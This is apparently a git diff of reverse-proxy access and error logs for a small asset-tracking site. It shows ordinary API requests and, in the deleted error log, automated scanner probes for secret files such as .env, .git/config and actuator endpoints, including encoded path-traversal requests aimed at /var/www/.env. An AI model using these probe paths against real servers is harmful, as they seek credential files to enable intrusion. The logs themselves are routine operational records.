[Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:10:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:11:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:20:38:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 13153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[18/Feb/2026:21:38:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" -[18/Feb/2026:21:38:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" -[18/Feb/2026:22:04:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.147.78.250] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" +[19/Feb/2026:00:43:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 156.146.39.184] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" "-" +[19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:03:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:03:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5539] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:04:34 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[19/Feb/2026:01:04:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 1846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" diff --git a/npm/data/logs/proxy-host-2_error.log b/npm/data/logs/proxy-host-2_error.log index f8dfb88..e69de29 100644 --- a/npm/data/logs/proxy-host-2_error.log +++ b/npm/data/logs/proxy-host-2_error.log @@ -1,79 +0,0 @@ -2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 22:59:23 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 22:59:49 [error] 314#314: *152 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:00:28 [error] 341#341: *181 connect() failed (111: Connection refused) while connecting to upstream, client: 195.123.244.84, server: asset.hanmocnn.co.kr, request: "HEAD / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr", referrer: "http://asset.hanmocnn.co.kr" -2026/02/14 23:00:30 [warn] 340#340: *185 using uninitialized "server" variable while logging request, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "LEAKIX" -2026/02/14 23:00:30 [error] 343#343: *187 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:31 [error] 342#342: *191 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "https://222.117.41.51:8000/server", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:32 [error] 346#346: *196 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:00:32 [error] 344#344: *195 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "https://222.117.41.51:8000/server-status", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:34 [error] 345#345: *204 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "https://222.117.41.51:8000/about", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:35 [error] 347#347: *207 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "https://222.117.41.51:8000/login.action", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:36 [error] 341#341: *211 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/_catalog", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:36 [error] 341#341: *214 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "https://222.117.41.51:8000/.DS_Store", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:37 [error] 341#341: *217 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "https://222.117.41.51:8000/.env", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:39 [error] 341#341: *221 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "https://222.117.41.51:8000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:41 [error] 341#341: *224 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "https://222.117.41.51:8000/.git/config", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:42 [error] 341#341: *226 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:43 [error] 341#341: *229 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "https://222.117.41.51:8000/api", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:43 [error] 341#341: *231 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/graphql", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:43 [error] 341#341: *233 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "https://222.117.41.51:8000/graphql/api", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:43 [error] 341#341: *235 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "https://222.117.41.51:8000/api/gql", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:44 [error] 341#341: *238 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "https://222.117.41.51:8000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:45 [error] 341#341: *244 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "https://222.117.41.51:8000/config.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:47 [error] 341#341: *248 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "https://222.117.41.51:8000/telescope/requests", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:47 [error] 341#341: *251 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "https://222.117.41.51:8000/info.php", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:48 [error] 341#341: *255 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "https://222.117.41.51:8000/.well-known/security.txt", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:48 [error] 341#341: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 34.72.176.129, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:49 [error] 340#340: *261 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "https://222.117.41.51:8000/actuator/env", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:51 [error] 353#353: *272 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger-ui.html", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:52 [error] 355#355: *276 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/index.html", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:53 [error] 356#356: *280 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/swagger-ui.html", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:54 [error] 354#354: *275 connect() failed (111: Connection refused) while connecting to upstream, client: 205.169.39.45, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:54 [error] 357#357: *286 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "https://222.117.41.51:8000/webjars/swagger-ui/index.html", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:55 [error] 358#358: *290 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:56 [error] 359#359: *294 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/swagger/v1/swagger.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:57 [error] 360#360: *298 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v2/api-docs", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:58 [error] 353#353: *302 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "https://222.117.41.51:8000/v3/api-docs", host: "asset.hanmocnn.co.kr" -2026/02/14 23:00:59 [error] 353#353: *305 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api-docs/swagger.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:00 [error] 353#353: *308 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "https://222.117.41.51:8000/api/swagger.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:01 [error] 353#353: *311 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "https://222.117.41.51:8000/@vite/env", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:02 [error] 353#353: *314 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "https://222.117.41.51:8000/.vscode/sftp.json", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:03 [error] 353#353: *317 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:04 [error] 353#353: *320 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "https://222.117.41.51:8000/?rest_route=/wp/v2/users/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:05 [error] 353#353: *323 connect() failed (111: Connection refused) while connecting to upstream, client: 128.199.182.55, server: asset.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "https://222.117.41.51:8000/debug/default/view?panel=config", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:01:10 [error] 353#353: *327 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:02:51 [error] 380#380: *352 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:11:33 [error] 382#382: *383 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://222.117.41.51:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:12:33 [error] 392#392: *407 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://222.117.41.51:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:16:33 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:8000/", host: "asset.hanmocnn.co.kr" -2026/02/14 23:16:40 [error] 406#406: *447 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8000/favicon.ico", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr" -2026/02/14 23:18:14 [error] 418#418: *470 asset-pilot could not be resolved (3: Host not found), client: 222.117.41.51, server: asset.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", host: "asset.hanmocnn.co.kr", referrer: "https://asset.hanmocnn.co.kr/" -2026/02/15 00:18:31 [warn] 379#379: *259 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/15 00:18:32 [warn] 381#381: *340 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/15 00:18:32 [warn] 383#383: *343 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1" -2026/02/15 00:18:33 [warn] 376#376: *347 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1" -2026/02/15 00:18:34 [warn] 376#376: *352 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/15 00:18:35 [warn] 376#376: *356 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/15 00:18:55 [warn] 382#382: *337 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/15 00:18:57 [warn] 376#376: *436 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/15 00:18:59 [warn] 376#376: *440 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1" -2026/02/15 00:19:01 [warn] 376#376: *444 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET 